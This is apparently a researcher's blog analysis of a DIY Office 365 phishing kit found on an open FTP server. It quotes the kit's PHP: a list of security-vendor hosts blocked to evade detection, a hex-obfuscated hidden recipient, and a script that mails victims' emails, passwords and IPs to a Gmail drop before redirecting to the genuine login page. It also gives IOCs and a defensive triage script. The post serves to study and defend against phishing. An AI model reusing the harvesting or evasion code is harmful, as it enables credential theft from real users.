The Anatomy of a DIY Phishing Kit

A look at the anatomy of a DIY phishing kit in the wild — and why they continue to be a popular choice for spammers and scammers.

INTRODUCTION

Phishing emails are deceptive attacks that rely on social engineering and technical trickery to succeed: malicious actors attempt to obtain sensitive data such as personally identifying information and network login credentials. The information collected from a successful campaign may be used for the attacker's own motives or simply sold on for a profit; the possibilities are seemingly endless.

Out-of-the-box phishing kits containing items such as pre-generated scripts and pre-configured mass mailers are becoming increasingly popular, sold for as little as $2 on underground forums. They require little technical skill, and can be easily tailored with minimal knowledge of PHP. The below is research I’ve collated over a few weeks — a glimpse into the anatomy of a phishing campaign.


PHISHING KITS IN THE WILD

It is not uncommon for phishers to deploy a phishing site by uploading a phishing kit to a webserver. In some cases, however, after unpacking the kit, they forget to lock the directories down, or remove the kit once they’re done. If the server has indexing enabled and allows the listing of directory contents, it is possible to download copies of the kits, which provide a wealth of knowledge for researchers. Put simply, many of these phishers are lazy — or just don’t know any better.

As mentioned in the introduction, phishing kits are sold cheaply on underground forums for as little as $2. With not much of a profit to be made, especially when phishing kits are widely circulated freely or stolen from compromised web servers, some of these developers write backdoors into their code. As a result, other malicious entities and third parties may gain access to web servers and captured credentials.

You can use tools like PhishingKitHunter, originally designed to help organisations find phishing kits using their website content and branding, to find these active kits in the wild.


A REAL WORLD EXAMPLE

A couple of weeks ago, a few hundred emails poured into the Exchange with the subject “wire receipt”, using a popular filter-evasion technique: embedding malicious URLs in images. Vaguely addressed and unsigned, this is quite an unsophisticated attempt which, unsurprisingly, turns out to be yet another Office 365 phishing attempt.

Left: A fake Office 365 sign in page. Right: The real Office 365 sign in page.

After some investigation, I arrived at the source: the server hosting the content of the websites I’d been directed to after filling in some false information. A quick banner grab on port 21 reveals a Pure-FTPd FTP server.

220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 11:31. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.

Sure enough, the content is available to the world — it’s no surprise that these phishing kits are stolen by other spammers for re-use. Traversing the directories, the FTP contains absolutely everything required to carry out a phishing attack. Outlined below are some of the notable code snippets I found to be of interest.


EVASION TECHNIQUES

In block_detectors.php, there is an array of banned hosts used to evade detection, as well as a lengthy list of carefully curated IP addresses belonging to antivirus and anti-phishing vendors. Visiting from any of the banned hosts or IP ranges results in a 404.

$banned_detectors = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot",
"calyxinstitute", "tor-exit", "abuse", "mozilla", "firefox");

By restricting these hosts and user agents, these actors are able to stay under the radar, avoiding crawlers, blacklists and trackers.

function disable_trackers(){
// the hex escapes decode to an e-mail address: a recipient hidden from anyone skimming the source
return "t\x65\x61\x6dz\x65\x65l\x6fg\x40g\x6d\x61\x69\x6c\x2e\x63\x6f\x6d";
}

Another key part of a successful phish is to avoid arousing suspicion. Often, after information is entered, these fake login pages redirect to a landing page; in some cases this is a genuine-looking success page. In this case, however, a redirect to https://outlook.office365.com/owa/live.ucl.ac.uk lands the unsuspecting victim on a genuine page, the one they would expect to see after logging into their OWA.

<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------Office365 Info-----------------------\n";
$message .= "Email : ".$_POST['userid']."\n";
$message .= "Password : ".$_POST['formtext2']."\n";
$message .= "IP : ".$ip."\n";
$message .= "---------------Created BY unknown--------------\n";
$send = "[REDACTED]@gmail.com";
$subject = "Result from Unknown";
$headers = "From: Office365 Info<customer-support@mrs>";
$headers .= $_POST['eMailAdd']."\n"; // unchecked POST value spliced straight into the mail headers
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP); // $IP and $to below are never defined anywhere in the kit
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
$fp = fopen("use.txt","a"); // captured credentials are also appended to a text file on the web server
fputs($fp,$message);
fclose($fp);

header("Location: https://outlook.office365.com/owa/live.ucl.ac.uk");

DATA VALIDATION

The index.php pages found within the phishing kit are written to collect as much information as possible from the visitors.

The scripts in index.php make requests to “http://www.geoplugin.net/json.gp?ip=” with the victim’s IP address appended, which returns further information such as city, country and area code. These are then sent back to the phishers along with the captured credentials.

Phishers are also getting wise to false information — defined below in a function called "is_rubbish", there are some pre-defined passwords that will not be accepted on the login page.

function is_rubbish($passwd){
$unwanted_password = array('fuck', 'cheater', 'test', '123456789',
'stupid', 'fraud', 'scam', 'spammer', 'suck', 'phish');
foreach($unwanted_password as $bad_pass){
if(strpos($passwd, $bad_pass) !== false){
return true;
}
}
return false;
}

Data validation is used both to collect as much information as possible and to reduce the amount of fake information sent back to the spammers — particularly useful if the data is to be sold on later down the line, or used to gain a foothold in a network.
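When a kit like this is recovered from an open directory, the first job is to pull out the pieces discussed above (the banned-host list, hex-hidden strings such as disable_trackers, the mail() recipients, the geoplugin lookup, the redirect target and the is_rubbish word list) without executing any of the PHP. The following triage script is an added example, not code from the post or the kit; it runs over a constructed PHP fragment modelled on the snippets quoted here, with placeholder addresses in place of the real ones.

```python
import re

# Constructed sample modelled on the kit fragments quoted in this post;
# the hidden address and drop recipient are placeholders, not the real ones.
KIT_SOURCE = r'''<?php
$banned_detectors = array("above", "google", "phishtank", "tor-exit");
function disable_trackers(){
return "\x68\x69\x64\x64\x65\x6e\x40example.test";
}
$send = "drop@example.test";
$geo = file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip);
$unwanted_password = array('test', '123456789', 'phish');
header("Location: https://outlook.office365.com/owa/live.ucl.ac.uk");
'''

HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')
STR_LIT = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
EMAIL = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
URL = re.compile(r'https?://[^\s"\']+')
ARRAY = re.compile(r'\$(\w+)\s*=\s*array\((.*?)\);', re.S)

def decode_php_string(lit):
    """Resolve hex escapes (backslash-x-NN) as PHP does in double-quoted strings."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), lit)

def php_arrays(src):
    """Map each '$name = array(...)' assignment to its list of quoted items."""
    return {name: [a or b for a, b in STR_LIT.findall(body)]
            for name, body in ARRAY.findall(src)}

def triage(src):
    """Extract the indicators a responder wants from a kit's PHP source."""
    report = {"obfuscated": [], "emails": set(), "urls": set()}
    for a, b in STR_LIT.findall(src):
        raw = a or b
        dec = decode_php_string(raw)
        if dec != raw:               # hex-hidden literal, e.g. a backdoor address
            report["obfuscated"].append(dec)
        report["emails"].update(EMAIL.findall(dec))   # exfil recipients
        report["urls"].update(URL.findall(dec))       # lookups and redirects
    arrays = php_arrays(src)
    report["blocklist"] = arrays.get("banned_detectors", [])
    report["unwanted_passwords"] = arrays.get("unwanted_password", [])
    return report

if __name__ == "__main__":
    for key, val in triage(KIT_SOURCE).items():
        print(f"{key}: {sorted(val)}")
```

Pointed at a real kit directory, the e-mail and URL sets are the items worth blocking and reporting, and the decoded literals are where a second, hidden recipient usually turns up.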


IOCS AND ARTEFACTS

An abuse complaint has been filed with the registrar, and the content has since been removed. However, should you want a copy of the phishing kit for research purposes, reach out on Twitter.

IP Addresses

199.195.128.238
67.225.185.12


3v4l.org/JZ99P/vld (PHP debug of a phishing kit)


CONCLUSION

In this case, not only did these actors practise poor operational security, but also poor information security — the artefacts in their personalised phishing kit actually led me to find them on Facebook. On the flip side, they’ve provided a useful insight into how a phishing attempt is organised.

As DIY phishing kits become easier to obtain, the amount of technical knowledge required to carry out a phishing scam is reduced. Instead of attempting to exploit an organisation’s complex digital defences, these actors realise that human nature is much easier to exploit — after all, links are designed to be clicked on, and attachments are designed to be opened.

Since the time of writing, it appears a new campaign has been launched targeting 126.com and 163.com, popular Chinese email providers — proving just how easy it is to quickly generate new campaigns.